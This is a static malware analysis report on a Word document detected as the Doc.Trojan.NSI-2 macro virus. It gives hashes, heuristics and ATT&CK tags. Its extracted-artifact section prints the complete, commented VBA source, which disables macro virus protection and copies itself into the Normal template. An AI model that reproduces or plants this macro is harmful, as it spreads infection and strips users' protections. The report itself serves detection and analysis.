Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f77760517e707148…

MALICIOUS

Office (OLE)

Size: 29.0 KB
Created: 2001-04-03 17:40:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: d8ffb40cfbd083e2dc997890321a7177
SHA-1: 54e401baf482e8e868729cefafddf7811d08368c
SHA-256: f77760517e7071488ee97927142248d437f8a6a80ac7a40d21655198b2b96be3
Risk score: 180

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Doc.Trojan.NSI-2. It contains VBA macros, specifically a Document_Open macro, which runs automatically when the document is opened. The macro copies its own VBA code into another document's VBA project (the Normal template, or the active document when it is already running from the template) and then saves the document, which suggests an attempt to embed malicious content or establish persistence.

Heuristics (3)

  • ClamAV: Doc.Trojan.NSI-2 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.NSI-2
  • VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • Document_Open macro (high, OLE_VBA_DOCOPEN)
    Document_Open macro

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1440 bytes
SHA-256: e079b95266a0e0d5660d16f0a2fb01e412fa87972179334ebea88a335adb5ab2
Detection: ClamAV: Doc.Trojan.NSI-2
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Private Sub Document_Close()

End Sub

Private Sub Document_Open()
    On Error Resume Next
    ' Turn off Word's macro virus warning and the user's ability to interrupt the macro
    Options.VirusProtection = False
    EnableCancelKey = wdCancelDisabled
    ' Source: the first VBA component (this module) of the container the macro runs from
    Set maci = MacroContainer.VBProject.VBComponents.Item(1)
    Set macic = maci.CodeModule
    ns$ = Left(macic.lines(1, 1), 21)
    ' Target: the Normal template; if already running from the template, target the open document instead
    Set inf = NormalTemplate: nsi$ = ns$
    If MacroContainer = inf Then Set inf = ActiveDocument: nsi$ = ns$
    Set infc = inf.VBProject.VBComponents
    Set infi = infc.Item(1)
    Set infic = infi.CodeModule
    infi.Name = "ThisDocument"
    ' Strip every other VBA component from the target project
    For mx = 2 To infc.Count
        infc.Remove infc.Item(2)
    Next mx
    ' Overwrite the target module with a copy of this module when the line counts differ
    If infic.countlines <> macic.CountOfLines Then
        infic.deletelines 1, infic.CountOfLines
        For coco = 1 To macic.CountOfLines
            infic.insertlines coco, macic.lines(coco, 1)
        Next coco
        infic.replaceline 1, nsi$
    End If
    ' Save the document in place unless its name already matches the marker in line 1
    If Left(ActiveDocument.Name, 8) <> Mid$(macic.lines(1, 1), 13, 8) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
    EnableCancelKey = wdCancelDisabled
End Sub
'ThisDocument v 1.0 1999